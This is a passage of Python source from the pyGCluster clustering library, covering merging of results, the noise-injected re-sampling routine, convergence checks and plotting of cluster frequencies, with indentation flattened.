# # print( len( self[ 'Data' ] ) )
# # exit(1)
# # identifier = 'WTF?'
# continue
identifiers.append( identifier )
data[ identifier ] = {}
for condition in self[ 'Conditions' ]:
data[ identifier ][ condition ] = self[ 'Data' ][ identifier ][ condition ]
internal_additional_labels[ identifier ] = [ '{0:4.2f}'.format( self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ index ] ) ]
else:
identifiers.append( '_placeholder_' )
if additional_labels != None:
for k in internal_additional_labels.keys():
if k in additional_labels.keys():
internal_additional_labels[ k ] += additional_labels[ k ]
hm_filename = '{0}-{1}.svg'.format( self[ 'Communities' ][ name ][ 'cluster ID' ], name[ 1 ] )
self.draw_expression_map(
identifiers = identifiers,
data = data,
conditions = conditions,
additional_labels = internal_additional_labels,
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
expression_map_filename = hm_filename,
legend_filename = None,
color_gradient = color_gradient,
box_style = box_style
)
self._print( '... community expression maps saved in "{0}"'.format( self[ 'Working directory' ] ), verbosity_level = 1 )
return
def delete_resampling_results(self):
'''
Resets all variables holding any result of the re-sampling process.
This includes the convergence determination as well as the community structure.
Does not delete the data that is intended to be clustered.
:rtype: None
'''
self[ 'Cluster 2 clusterID' ] = {}
self[ 'Cluster counts' ] = None
self[ 'Distances' ] = []
self[ 'Linkages' ] = []
self[ 'Distance-linkage combinations' ] = []
self[ 'Iterations' ] = 0
self[ 'Convergence determination - params' ] = {}
self[ 'Convergence determination - iteration 2 n_mostfreq' ] = {}
self[ 'Convergence determination - first detected at iteration' ] = 0
self[ 'Communities' ] = {}
self[ 'Function parameters' ] = {}
return
def check_if_data_is_log2_transformed(self):
'''
Simple check whether any value of the data tuples is below zero.
A value below zero indicates that the input data was log2-transformed.
:rtype: boolean
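
Example (sketch; "my_cluster" is a placeholder instance):

>>> if not my_cluster.check_if_data_is_log2_transformed():
...     print( 'Input ratios do not appear to be log2-transformed.' )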
'''
for identifier in self[ 'Data' ].keys():
for condition, data_tuple in self[ 'Data' ][ identifier ].items():
for value in data_tuple:
if value < 0:
return True
return False
def __add__(self, other):
'''
Adds the re-sampling results of one pyGCluster instance to another one.
If the clustered data differs between the two instances, the other instance is NOT added.
If the distance-linkage combinations of the two instances differ, the other instance is NOT added.
:param other: the pyGCluster instance that is to be added to self.
:type other: pyGCluster instance
:rtype: None
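
Example (sketch; "instance_a" and "instance_b" are placeholders for two
instances that were initialized with identical data and re-sampled with the
same distance-linkage combinations):

>>> instance_a + instance_b   # counts of instance_b are merged into instance_a in place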
'''
import numpy
assert self[ 'Data' ] == other[ 'Data' ], '[ ERROR ] pyGCluster-instances with different clustered data cannot be merged!'
assert sorted( self[ 'Distance-linkage combinations' ] ) == sorted( other[ 'Distance-linkage combinations' ] ), '[ ERROR ] pyGCluster-instances with a different distance-linkage combinations cannot be merged!'
self[ 'Iterations' ] += other[ 'Iterations' ]
if self[ 'Cluster counts' ] is None:
self[ 'Cluster counts' ] = numpy.zeros(
( 10 ** 4, len( self[ 'Distance-linkage combinations' ] ) ),
dtype = numpy.uint32
)
otherDLC2selfDLC = {}
for other_dlc_index, dlc in enumerate( other[ 'Distance-linkage combinations' ] ):
self_dlc_index = self[ 'Distance-linkage combinations' ].index( dlc )
otherDLC2selfDLC[ other_dlc_index ] = self_dlc_index
# merge clusters from other into self
for cluster, other_clusterID in other[ 'Cluster 2 clusterID' ].items():
if cluster not in self[ 'Cluster 2 clusterID' ]:
self[ 'Cluster 2 clusterID' ][ cluster ] = len( self[ 'Cluster 2 clusterID' ] ) # new cluster found, assign index
self_clusterID = self[ 'Cluster 2 clusterID' ][ cluster ]
for other_dlc_index, self_dlc_index in otherDLC2selfDLC.items():
try:
self[ 'Cluster counts' ][ self_clusterID ]
except IndexError:
self[ 'Cluster counts' ] = numpy.concatenate(
(
self[ 'Cluster counts' ],
numpy.zeros( ( 10 ** 4, len( self[ 'Distance-linkage combinations' ] ) ), dtype = numpy.uint32 )
)
) # add rows at bottom
self[ 'Cluster counts' ][ self_clusterID ][ self_dlc_index ] += other[ 'Cluster counts' ][ other_clusterID ][ other_dlc_index ]
return
def resample(self, distances, linkages, function_2_generate_noise_injected_datasets = None, min_cluster_size = 4, alphabet = None, force_plotting = False, min_cluster_freq_2_retain = 0.001, pickle_filename = 'pyGCluster_resampled.pkl', cpus_2_use = None, iter_tol = 0.01 / 100000, iter_step = 5000, iter_max = 250000, iter_top_P = 0.001, iter_window = 50000, iter_till_the_end = False):
'''
Routine for the assessment of cluster reproducibility (re-sampling routine).
To this end, a high number of noise-injected datasets is created; these are subsequently clustered by AHC.
Those are created via :py:func:`pyGCluster.function_2_generate_noise_injected_datasets` (default = usage of Gaussian distributions).
Each 'simulated' dataset is then subjected to AHC x times, where x equals the number of distance-linkage combinations that come from all possible combinations of "distances" and "linkages".
In order to speed up the re-sampling routine, it is distributed to multiple threads, if cpus_2_use > 1.
The re-sampling routine stops once either convergence (see below) is detected or iter_max iterations have been performed.
Eventually, only clusters with a maximum frequency of at least min_cluster_freq_2_retain are stored; all others are discarded.
In order to visually inspect convergence, a convergence plot is created.
For more information about the convergence estimation, see Supplementary Material of pyGCluster's publication.
For a complete list of possible distance metrics see
http://docs.scipy.org/doc/scipy/reference/spatial.distance.html
and for the available linkage methods see
http://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html
.. note ::
If memory is of concern (e.g. for a large dataset, > 5000 objects), cpus_2_use should be kept low.
:param distances: list of distance metrics, given as strings, e.g. [ 'correlation', 'euclidean' ]
:type distances: list
:param linkages: list of linkage methods, given as strings, e.g. [ 'average', 'complete', 'ward' ]
:type linkages: list
:param function_2_generate_noise_injected_datasets: function to generate noise-injected datasets. If None (default), Gaussian distributions are used.
:type function_2_generate_noise_injected_datasets: function
:param min_cluster_size: minimum size of a cluster, so that it is included in the assessment of cluster reproducibilities.
:type min_cluster_size: int
:param alphabet: alphabet used to convert decimal indices to characters to save memory. Defaults to string.printable, without ','.
:type alphabet: string
.. note ::
If alphabet contains ',', this character is removed from alphabet, because the indices comprising a cluster are saved comma-separated.
:param force_plotting: the convergence plot is created after each iter_step iteration (otherwise only when convergence is detected).
:type force_plotting: boolean
:param min_cluster_freq_2_retain: ]0, 1[ minimum frequency (only the maximum of the dlc-frequencies matters here) a cluster has to exhibit in order to be stored in pyGCluster once all iterations are finished.
:type min_cluster_freq_2_retain: float
:param cpus_2_use: number of threads that are evoked in the re-sampling routine.
:type cpus_2_use: int
:param iter_max: maximum number of re-sampling iterations.
:type iter_max: int
Convergence determination:
:param iter_tol: ]0, 1e-3[ value for the threshold of the median of normalized slopes, in order to declare convergence.
:type iter_tol: float
:param iter_step: number of iterations each multiprocess performs and simultaneously the interval in which to check for convergence.
:type iter_step: int
:param iter_top_P: ]0, 1[ for the convergence estimation, the number of most frequent clusters is examined. This is the threshold for the minimum frequency of a cluster to be counted among them.
:type iter_top_P: float
:param iter_window: size of the sliding window in iterations. The median is obtained from normalized slopes inside this window - *should be a multiple of iter_step*
:type iter_window: int
:param iter_till_the_end: if set to True, the convergence determination is switched off; hence, re-sampling is performed until iter_max is reached.
:type iter_till_the_end: boolean
:rtype: None
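
Example (a minimal sketch; "my_cluster" is an initialized Cluster instance and
the iteration limit is kept deliberately small for illustration):

>>> my_cluster.resample(
...     distances = [ 'correlation', 'euclidean' ],
...     linkages = [ 'complete', 'average', 'ward' ],
...     iter_max = 50000,
...     pickle_filename = 'pyGCluster_resampled.pkl'
... )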
'''
self[ 'Function parameters' ][ self.resample.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
import numpy
import scipy.cluster.hierarchy as sch
import scipy.spatial.distance as ssd
if function_2_generate_noise_injected_datasets is None:
function_2_generate_noise_injected_datasets = yield_noisejected_dataset
if alphabet is None:
alphabet = string.printable
alphabet = alphabet.replace( ',', '' )
## create distance-linkage combinations (dlc)
self[ 'Distances' ] = distances
self[ 'Linkages' ] = linkages
# check if all distance metrices are valid:
invalid_dists = set( self[ 'Distances' ] ) - set( dir( ssd ) )
if invalid_dists:
s = '[ WARNING ] invalid distance metrics! "{0}" are not in "scipy.spatial.distance".'
self._print( s.format( ', '.join( invalid_dists ) ), verbosity_level = 0 )
# check if all linkage methods are valid:
invalid_linkages = set( self[ 'Linkages' ] ) - sch._cpy_linkage_methods
if invalid_linkages:
s = '[ WARNING ] invalid linkage methods! "{0}" are not in "scipy.cluster.hierarchy".'
self._print( s.format( ', '.join( invalid_linkages ) ), verbosity_level = 0 )
# get all possible distance-linkage combinations:
self[ 'Distance-linkage combinations' ] = []
for distance in self[ 'Distances' ]:
for linkage in self[ 'Linkages' ]:
if distance != 'euclidean' and linkage in sch._cpy_euclid_methods:
continue
self[ 'Distance-linkage combinations' ].append( '{0}-{1}'.format( distance, linkage ) )
n_dlc = len( self[ 'Distance-linkage combinations' ] )
self._print( '{0} distance-linkage combinations are evaluated.'.format( n_dlc ), verbosity_level = 2 )
self._print( '... those are: {0}.'.format( ', '.join( self[ 'Distance-linkage combinations' ] ) ), verbosity_level = 2 )
## check if permission to write:
if pickle_filename:
try:
with open( os.path.join( self[ 'Working directory' ], 'tmp.txt' ), 'w' ) as fout:
pass
os.remove( os.path.join( self[ 'Working directory' ], 'tmp.txt' ) )
except IOError:
s = '[ WARNING ] You do not have permission, or folder does not exist!\n\tresults in "{0}" are NOT pickled!'
self._print( s.format( self[ 'Working directory' ] ), verbosity_level = 0 )
pickle_filename = False
## check if a pickle file with the same name is already in the "Working directory"
## this indicates that clustering is likely to be continued:
if pickle_filename in os.listdir( self[ 'Working directory' ] ):
self._print( 'Pickle file with the same name detected! Pickle "{0}" will be loaded and clustering continued ...'.format( pickle_filename ), verbosity_level = 0 )
loaded = Cluster()
loaded.load( os.path.join( self[ 'Working directory' ], pickle_filename ) )
self + loaded
## create tmp_struct to store the cluster counts:
tmpstruct_clustercounts = {}
tmpstruct_clustercounts[ 'Cluster counts' ] = numpy.zeros( ( 10 ** 5, n_dlc ), dtype = numpy.uint32 )
tmpstruct_clustercounts[ 'Cluster 2 clusterID' ] = {}
tmpstruct_clustercounts[ 'Discarded IDs' ] = set()
## initialize variables for the convergence determination
self[ 'Convergence determination - params' ] = {}
self[ 'Convergence determination - params' ][ 'iter_step' ] = iter_step
self[ 'Convergence determination - params' ][ 'iter_top_P' ] = iter_top_P
self[ 'Convergence determination - params' ][ 'iter_tol' ] = iter_tol
self[ 'Convergence determination - params' ][ 'iter_window' ] = iter_window
self[ 'Convergence determination - params' ][ 'iter_max' ] = iter_max
if iter_window % iter_step:
s = '[ WARNING ] iter_window = {0} is NOT a multiple of iter_step = {1}. Better re-call with a multiple of iter_step!'
self._print( s.format( iter_window, iter_step ), verbosity_level = 1 )
## prepare for multiprocesses:
if cpus_2_use != None:
if cpus_2_use > multiprocessing.cpu_count():
s = '[ WARNING ] You requested to perform re-sampling on {0} threads, but only {1} available -> better re-call with "cpus_2_use = {1}"!'
self._print( s.format( cpus_2_use, multiprocessing.cpu_count() ), verbosity_level = 0 )
n_multiprocesses = cpus_2_use
else:
n_multiprocesses = multiprocessing.cpu_count()
DataQ = multiprocessing.Queue()
kwargs4multiprocess = {}
kwargs4multiprocess[ 'DataQ' ] = DataQ
kwargs4multiprocess[ 'data' ] = self[ 'Data' ]
kwargs4multiprocess[ 'iterations' ] = iter_step
kwargs4multiprocess[ 'alphabet' ] = alphabet
kwargs4multiprocess[ 'dlc' ] = self[ 'Distance-linkage combinations' ]
kwargs4multiprocess[ 'min_cluster_size' ] = min_cluster_size
kwargs4multiprocess[ 'min_cluster_freq_2_retain' ] = min_cluster_freq_2_retain
kwargs4multiprocess[ 'function_2_generate_noise_injected_datasets' ] = function_2_generate_noise_injected_datasets
# os.nice() is not available on Windows; lower the process priority only on non-Windows systems
try:
sys.getwindowsversion()
except:
os.nice( 10 )
min_count = int( min_cluster_freq_2_retain * kwargs4multiprocess[ 'iterations' ] * 0.5 )
if min_count < 2:
s = '[ WARNING ] params "min_cluster_freq_2_retain" = {0} and "iter_step" = {1}, hence min_count = {2}\n\t-> huge accumulation of unstable clusters in pyGCluster!'
self._print( s.format( min_cluster_freq_2_retain, kwargs4multiprocess[ 'iterations' ], min_count ), verbosity_level = 1 )
# check if multiprocess are valid:
self._print( 'checking if multiprocesses are functioning ...', end = ' ', verbosity_level = 2 )
try:
tmp_kwargs4multiprocess = { k : v for k, v in kwargs4multiprocess.items() }
tmp_kwargs4multiprocess[ 'iterations' ] = 1
p = multiprocessing.Process( target = resampling_multiprocess, kwargs = tmp_kwargs4multiprocess )
p.start()
del tmp_kwargs4multiprocess
except:
self._print( '[ ERROR ] Failed to launch multi-processes!', file = sys.stderr, verbosity_level = 0 )
seekAndDestry( [ p ] )
raise
try:
DataQ.get()
p.join()
except:
self._print( '[ ERROR ] Failed to collect multi-processes!', file = sys.stderr, verbosity_level = 0 )
seekAndDestry( [ p ] )
raise
self._print( 'success!', verbosity_level = 2 )
## other stuff:
self[ 'Convergence determination - iteration 2 n_mostfreq' ] = {}
iteration = 0
converged = False
ask2continue = False
iter_to_continue = False
### now comes the actual re-sampling routine :)
while not converged:
# prevent exceeding iter_max:
if iter_max < iteration + n_multiprocesses * iter_step and not iter_to_continue:
n_multiprocesses_tmp = int( math.ceil( float( iter_max - iteration ) / iter_step ) )
s = 'Continuing another {0} (# processes) * {1} (iter_step) iterations would exceed iter_max (= {2}). Hence, # processes are lowered to {3} so that {4} iterations have been totally performed.'
self._print( s.format( n_multiprocesses, iter_step, iter_max, n_multiprocesses_tmp, iteration + n_multiprocesses_tmp * iter_step ), verbosity_level = 2 )
n_multiprocesses = n_multiprocesses_tmp
# Launching multi-processes
processes = []
for i in range( n_multiprocesses ):
p = multiprocessing.Process( target = resampling_multiprocess, kwargs = kwargs4multiprocess )
p.start()
processes.append( p )
time.sleep( random.random() ) # to increase randomness!
# Collecting Process outputs and transfer cluster-counts into 'tmpstruct_clustercounts'
for i in range( n_multiprocesses ):
cluster_counts_list = DataQ.get()
iteration += kwargs4multiprocess[ 'iterations' ]
self._print( "Clustering. Resampling data : iteration {0: >7}/{1}".format( iteration, iter_max ), end = '\r', file = sys.stderr, verbosity_level = 1 )
for cluster, counts in cluster_counts_list:
# get cluster ID:
if cluster in tmpstruct_clustercounts[ 'Cluster 2 clusterID' ]:
clusterID = tmpstruct_clustercounts[ 'Cluster 2 clusterID' ][ cluster ]
else:
# if available, get a discarded ID and assign this ID to the cluster:
if tmpstruct_clustercounts[ 'Discarded IDs' ]:
try:
clusterID = tmpstruct_clustercounts[ 'Discarded IDs' ].pop()
except KeyError: # KeyError: 'pop from an empty set' = set is empty
clusterID = len( tmpstruct_clustercounts[ 'Cluster 2 clusterID' ] )
else:
clusterID = len( tmpstruct_clustercounts[ 'Cluster 2 clusterID' ] )
tmpstruct_clustercounts[ 'Cluster 2 clusterID' ][ cluster ] = clusterID
# update counts:
try:
tmpstruct_clustercounts[ 'Cluster counts' ][ clusterID ] += counts
except IndexError:
tmpstruct_clustercounts[ 'Cluster counts' ] = numpy.concatenate(
( tmpstruct_clustercounts[ 'Cluster counts' ],
numpy.zeros( ( 10 ** 5, n_dlc ), dtype = numpy.uint32 )
)
)
tmpstruct_clustercounts[ 'Cluster counts' ][ clusterID ] += counts
# determine most frequent clusters:
min_count = iteration * iter_top_P
mostfreqIDs = numpy.unique( numpy.nonzero( tmpstruct_clustercounts[ 'Cluster counts' ] >= min_count )[ 0 ] )
self[ 'Convergence determination - iteration 2 n_mostfreq' ][ iteration ] = len( mostfreqIDs )
del mostfreqIDs
# check if converged:
if iter_till_the_end == False:
converged = self.check4convergence()
if converged or force_plotting:
self.convergence_plot()
del cluster_counts_list
# terminate processes:
for p in processes:
p.join()
# once all processes finished iter_step clusterings, perform a purging step:
# discard all clusters with a maximum count of the threshold:
min_required_count = int( min_cluster_freq_2_retain * 0.5 * ( kwargs4multiprocess[ 'iterations' ] * n_multiprocesses ) )
self._print('\nDiscarding {0}-count-clusters ...'.format( min_required_count ), end = ' ', file = sys.stderr, verbosity_level = 2)
max_counts = numpy.amax( tmpstruct_clustercounts[ 'Cluster counts' ], axis = 1 ) # get max count for each cluster
IDs2discard = set( numpy.nonzero( max_counts == 1 )[ 0 ] )
del max_counts
# reset counts:
for ID in IDs2discard:
tmpstruct_clustercounts[ 'Cluster counts' ][ ID ][ : ] = 0
# delete those clusters which were attributed the discarded clusterIDs
clusters2discard = [ c for c, cID in tmpstruct_clustercounts[ 'Cluster 2 clusterID' ].items() if cID in IDs2discard ]
for cluster in clusters2discard:
del tmpstruct_clustercounts[ 'Cluster 2 clusterID' ][ cluster ]
del cluster
del clusters2discard
self._print( '{0} discarded.'.format( len( IDs2discard ) ), file = sys.stderr, verbosity_level = 2 )
tmpstruct_clustercounts[ 'Discarded IDs' ] = IDs2discard
del IDs2discard
if converged and iteration < iter_max and not iter_till_the_end:
ask2continue = True
elif iteration >= iter_max:
self._print( '\niter_max reached. See convergence plot. Stopping re-sampling if not defined otherwise ...', verbosity_level = 1 )
converged = True
self.convergence_plot()
ask2continue = True
# ask if user wants to continue with the re-sampling process:
if ask2continue and self[ 'Verbosity level' ] > 0:
self._print( '\nEnter how many iterations you would like to continue. (Has to be a multiple of iterstep = {0})'.format( iter_step ), verbosity_level = 1 )
self._print( '(enter "0" to stop resampling.)', verbosity_level = 1 )
self._print( '(enter "-1" to resample until iter_max (= {0}) is reached.)'.format( iter_max ), verbosity_level = 1 )
while True:
answer = input( 'Enter a number ...' )
try:
iter_to_continue = int( answer )
break
except:
self._print( 'INT conversion failed. Please try again!', verbosity_level = 1 )
converged = False
if iter_to_continue == 0:
converged = True
elif iter_to_continue == -1:
iter_till_the_end = True
ask2continue = False
if iteration == iter_max:
converged = True
else:
iter_to_continue = int( iter_step * round(iter_to_continue / float(iter_step)) )
if iter_to_continue < iter_step:
iter_to_continue = iter_step
iter_to_continue = int( math.ceil( float( iter_to_continue ) / n_multiprocesses ) )
self._print( 'Resampling will continue another {0} iterations.'.format( iter_to_continue * n_multiprocesses ), verbosity_level = 1 )
kwargs4multiprocess[ 'iterations' ] = iter_to_continue
# final filtering: store only clusters in pyGCluster whose max_frequencies are above min_cluster_freq_2_retain (default 0.001):
min_count = iteration * min_cluster_freq_2_retain
clusterIDs2retain = set( numpy.nonzero( tmpstruct_clustercounts[ 'Cluster counts' ] >= min_count )[0] )
self._print( '{0} clusters above threshold of {1}. '.format( len( clusterIDs2retain ), min_cluster_freq_2_retain ), verbosity_level = 2 )
self[ 'Cluster counts' ] = numpy.zeros( ( len( clusterIDs2retain ), n_dlc ), dtype = numpy.uint32 )
baseX = len( alphabet )
tmp = {}
tmp[ 'Iterations' ] = iteration
tmp[ 'Cluster 2 clusterID' ] = {}
tmp[ 'Cluster counts' ] = tmpstruct_clustercounts[ 'Cluster counts' ]
tmp[ 'Distance-linkage combinations' ] = self[ 'Distance-linkage combinations' ]
tmp[ 'Data' ] = self[ 'Data' ]
for cluster, clusterID in tmpstruct_clustercounts[ 'Cluster 2 clusterID' ].items():
if clusterID in clusterIDs2retain:
final_cluster = []
# map cluster back to decimal indices:
for baseXstring in cluster.split( ',' ):
index = 0
for i, digit in enumerate( baseXstring[ ::-1 ] ):
index += alphabet.find( digit ) * baseX ** i
final_cluster.append( index )
final_cluster.sort()
final_cluster = tuple( final_cluster )
tmp[ 'Cluster 2 clusterID' ][ final_cluster ] = clusterID
self.__add__( tmp )
# pickle results:
if pickle_filename:
self.save( pickle_filename )
s = 're-sampling routine for {0} iterations finished. {1} clusters were obtained.'
self._print( s.format( iteration, len(clusterIDs2retain) ), verbosity_level = 1 )
return
def _get_normalized_slope(self, y2, y1, iter_step):
'''
Calculates the normalized slope between two 2D-coordinates,
i.e. ( y2 / y1 - 1.0 ) / iter_step,
where y = amount of most frequent clusters at a certain iteration,
and iter_step = x2 - x1.
:param y2: the y-coordinate of the second point.
:type y2: float
:param y1: the y-coordinate of the first point.
:type y1: float
:param iter_step: the difference between the x-coordinates of the two points, i.e. x2 - x1.
:type iter_step: float
:rtype: float
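
Worked example (illustrative numbers only): with y1 = 100 most frequent
clusters at iteration 5000 and y2 = 105 at iteration 10000,
( 105 / 100 - 1.0 ) / 5000 = 1e-5.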
'''
numerator = float( y2 ) / float( y1 ) - 1.0
norm_slope = numerator / float( iter_step )
return norm_slope
def check4convergence(self):
'''
Checks if the re-sampling routine may be terminated, because the number of most frequent clusters remains almost constant.
This is done by examining a plot of the amount of most frequent clusters vs. the number of iterations.
Convergence is declared once the median normalized slope in a given window of iterations is equal or below "iter_tol".
For further information see Supplementary Material of the corresponding publication.
:rtype: boolean
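
Illustration with the default parameters: with iter_step = 5000,
iter_window = 50000 and iter_tol = 1e-7, convergence is declared once the
median of the 10 normalized slopes inside the sliding window lies within
[ -1e-7, +1e-7 ].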
'''
converged = False
sorted_iter2nfreqs = sorted( self[ 'Convergence determination - iteration 2 n_mostfreq' ].items() )
iter_step = self[ 'Convergence determination - params' ][ 'iter_step' ]
iter_window = self[ 'Convergence determination - params' ][ 'iter_window' ]
iter_tol = self[ 'Convergence determination - params' ][ 'iter_tol' ]
# determine normalized slope:
norm_slopes = []
for i, ( iteration, n_mostfreq ) in enumerate( sorted_iter2nfreqs ):
if i == 0:
continue
n_mostfreq_before = sorted_iter2nfreqs[ i - 1 ][ 1 ]
norm_slope = self._get_normalized_slope( y2 = n_mostfreq, y1 = n_mostfreq_before, iter_step = iter_step )
norm_slopes.append( norm_slope )
# determine convergence - is the median of normalized slopes in iter_window iterations <= iter_tol?
n_slopes = int( round( float( iter_window ) / iter_step ) ) # prepare for sliding window
for i in range( len( norm_slopes ) - n_slopes + 1 ):
iteration = iter_step + iter_step * n_slopes + i * iter_step
slopes_in_sliding_window = norm_slopes[ i : i + n_slopes ]
median_slope = self.median( slopes_in_sliding_window )
if -iter_tol <= median_slope <= iter_tol:
converged = True
self._print( '\npotentially converged. Check convergence plot!', file = sys.stderr, verbosity_level = 2 )
self[ 'Convergence determination - first detected at iteration' ] = iteration
break
return converged
def convergence_plot(self, filename = 'convergence_plot.pdf'):
'''
Creates a two-sided PDF file containing the full picture of the convergence plot, as well as a zoom of it.
The convergence plot illustrates the development of the amount of most frequent clusters vs. the number of iterations.
The dotted line in this plots represents the normalized slope, which is used for internal convergence determination.
If rpy2 cannot be imported, a CSV file is created instead.
:param filename: the filename of the PDF (or CSV) file.
:type filename: string
:rtype: none
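
Example (sketch; requires a prior call of resample() so that the convergence
statistics are available):

>>> my_cluster.convergence_plot( filename = 'my_convergence_plot.pdf' )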
'''
try:
from rpy2.robjects import IntVector, FloatVector, StrVector
from rpy2.robjects.packages import importr
graphics = importr( 'graphics' )
grdevices = importr( 'grDevices' )
except ImportError:
filename = filename.replace( '.pdf', '.csv' )
with open( os.path.join( self[ 'Working directory' ], filename ), 'w' ) as fout:
print( 'iteration,amount of most frequent clusters', file = fout )
for iteration, n_mostfreq in self[ 'Convergence determination - iteration 2 n_mostfreq' ].items():
print( '{0},{1}'.format( iteration, n_mostfreq ), file = fout )
self._print( '[ INFO ] Since rpy2 could not be imported, a CSV file instead of a PDF plot of convergence was created. See in "{0}".'.format( os.path.join( self[ 'Working directory' ], filename ) ), file = sys.stderr, verbosity_level = 1 )
return
def _add_lines( points2connect, lty = 1, color = 'black' ):
for i, ( x, y ) in enumerate( points2connect ):
if i == 0:
continue
x_before, y_before = points2connect[ i - 1 ]
graphics.lines( IntVector( [ x_before, x ] ),
FloatVector( [ y_before, y ] ),
lty = lty,
col = color
)
iter_step = self[ 'Convergence determination - params' ][ 'iter_step' ]
iter_window = self[ 'Convergence determination - params' ][ 'iter_window' ]
iter_tol = self[ 'Convergence determination - params' ][ 'iter_tol' ]
iteration2mostfreq = self[ 'Convergence determination - iteration 2 n_mostfreq' ]
sorted_iter2mostfreq = sorted( iteration2mostfreq.items() )
# plot convergence curve:
grdevices.pdf( file = os.path.join( self[ 'Working directory' ], filename ), width = 12, height = 12 )
for tag in [ 'full', 'zoom' ]:
points = sorted_iter2mostfreq
Ys = [ y for x, y in points ]
if tag == 'full':
ylim = ( min( Ys ), max( Ys ) )
title = '#most_freq (left y-axis) and normalized_slope (= (current / before - 1.0) / iter_step) (right y-axis)'
elif tag == 'zoom':
ylim = ( min( Ys ), min( Ys ) * 1.075 )
title = 'ZOOM'
subtitle = 'iter_top_P = {0}, iter_step = {1}, iter_tol = {2}, iter_window = {4}, iter_max = {3}'
subtitle = subtitle.format(
self[ 'Convergence determination - params' ][ 'iter_top_P' ],
iter_step,
iter_tol,
self[ 'Convergence determination - params' ][ 'iter_max' ],
iter_window
)
graphics.plot(
IntVector( [ x for x, y in points ] ),
IntVector( Ys ),
main = title,
sub = subtitle,
xlab = 'iteration', xaxt = 'n',
ylab = 'len(most_freq)', ylim = IntVector( ylim ),
col = 'black',
pch = 16
)
_add_lines( points, lty = 1, color = 'black' )
x_axis_ticks = tuple( range( iter_step, max( iteration2mostfreq.keys() ) + 1, iter_step ) )
graphics.axis(1, at = IntVector( x_axis_ticks ), labels = [ '{0}k'.format( tick / 1000 ) for tick in x_axis_ticks ], las = 2, **{ 'cex.axis' : 0.75 } )
graphics.axis(3, at = IntVector( x_axis_ticks ), labels = StrVector( [ '' for tick in x_axis_ticks ] ) )
graphics.legend(
'bottomleft',
legend = StrVector( [ '#most_freq', 'normalized_slope' ] ),
lty = IntVector( [1, 2] ),
pch = IntVector( [16, 1] ),
bty = 'n'
)
# add second plot = normalized_slope-plot:
graphics.par( new = True )
critical_interval = ( -iter_tol, iter_tol )
try:
firstConvergedAtIter = self[ 'Convergence determination - first detected at iteration' ]
except KeyError:
self.check4convergence()
firstConvergedAtIter = self[ 'Convergence determination - first detected at iteration' ]
iter2normslope = [ ( iter_step, -1.0 ) ]
for i, (iteration, n_mostfreq) in enumerate( sorted_iter2mostfreq[ 1: ] ):
iteration_before, n_mostfreq_before = sorted_iter2mostfreq[ i ] # iteration2mostfreq[ iteration - iter_step ]
norm_slope = self._get_normalized_slope( y2 = n_mostfreq, y1 = n_mostfreq_before, iter_step = iteration - iteration_before )
iter2normslope.append( ( iteration, norm_slope ) )
points = iter2normslope
Ys = [ y for x, y in points ]
ylim = ( critical_interval[ 0 ] * 20, critical_interval[ 1 ] * 20)
graphics.plot(
IntVector( [ x for x, y in points ] ),
FloatVector( Ys ),
main = '',
xlab = '',
xaxt = 'n',
ylab = '',
yaxt = 'n',
ylim = FloatVector( ylim ),
pch = 1
)
_add_lines( points, lty = 2, color = 'black' )
graphics.abline( v = firstConvergedAtIter, lty = 1, col = 'blue' )
graphics.lines( IntVector( [ firstConvergedAtIter - iter_window, firstConvergedAtIter ] ), FloatVector( [ 0, 0 ] ), col = 'darkgreen' )
graphics.text( firstConvergedAtIter, 0, str( firstConvergedAtIter / 1000 ), col = 'blue' )
graphics.abline( h = critical_interval[ 0 ], lty = 3, col = 'darkgreen' )
graphics.abline( h = critical_interval[ 1 ], lty = 3, col = 'darkgreen' )
graphics.axis(4, FloatVector( [ ylim[ 0 ], ylim[ 0 ] / 20. * 10, 0, ylim[ 1 ] / 20. * 10, ylim[ 1 ] ] ) )
grdevices.dev_off()
self._print( '... plot of convergence finished. See plot in "{0}".'.format( os.path.join( self[ 'Working directory' ], filename ) ), file = sys.stderr, verbosity_level = 2 )
return
def plot_clusterfreqs(self, min_cluster_size = 4, top_X_clusters = None, threshold_4_the_lowest_max_freq = 0.01):
'''
Plots the frequencies of each cluster as an expression map:
which cluster was found by which distance-linkage combination, and with what frequency?
The plot's filename is prefixed by 'clusterFreqsMap', followed by the values of the parameters.
E.g. 'clusterFreqsMap_minSize4_top0clusters_top10promille.svg'.
Clusters are sorted by size.
:param min_cluster_size: only clusters with a size equal to or greater than min_cluster_size appear in the cluster frequency plot.
:type min_cluster_size: int
:param threshold_4_the_lowest_max_freq: ]0, 1[ Clusters must have a maximum frequency of at least threshold_4_the_lowest_max_freq to appear in the plot.
:type threshold_4_the_lowest_max_freq: float
:param top_X_clusters: plot only the top X clusters of the frequency-sorted list of clusters whose maximum cluster frequency is at least threshold_4_the_lowest_max_freq (the clusterfreq-plot is still sorted by size).
:type top_X_clusters: int
:rtype: None
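
Example (sketch; requires completed re-sampling results):

>>> my_cluster.plot_clusterfreqs(
...     min_cluster_size = 4,
...     top_X_clusters = 25,
...     threshold_4_the_lowest_max_freq = 0.01
... )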
'''
self[ 'Function parameters' ][ self.plot_clusterfreqs.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
allClusters_sortedByLength_l = sorted( self._get_most_frequent_clusters(min_cluster_size = min_cluster_size, top_X_clusters = top_X_clusters, threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq), key = len, reverse = True )
identifiers = []
data = {}
freqs = set()
for cluster in allClusters_sortedByLength_l:
identifier = 'Cluster ID: {0}, size: {1}'.format( self[ 'Cluster 2 clusterID' ][ cluster ], len( cluster ) )
identifiers.append( identifier )
data[ identifier ] = {}
cFreq, cFreqDict = self.frequencies( cluster = cluster )
for dlc, frequency in sorted( cFreqDict.items() ):
data[ identifier ][ dlc ] = ( frequency, sys.float_info.epsilon )
freqs.add( round( frequency, 2) )
hm_filename = 'clusterFreqsMap_minSize{0}_top{1}clusters_top{2:.0f}promille'.format( min_cluster_size, top_X_clusters, threshold_4_the_lowest_max_freq * 1000 )
# max_value_4_expression_map = sorted( freqs )[ -3 ] # since root cluster has a freq of 1.0, position -1 is always 1.0 (and -2 close to 1.0 (root, too)!)
self.draw_expression_map(
identifiers = identifiers,
data = data,
            conditions = sorted( self[ 'Distance-linkage combinations' ] ), # one column per distance-linkage combination
additional_labels = {},
# min_value_4_expression_map = 0.0,
max_value_4_expression_map = max( freqs ),
expression_map_filename = hm_filename+'.svg',
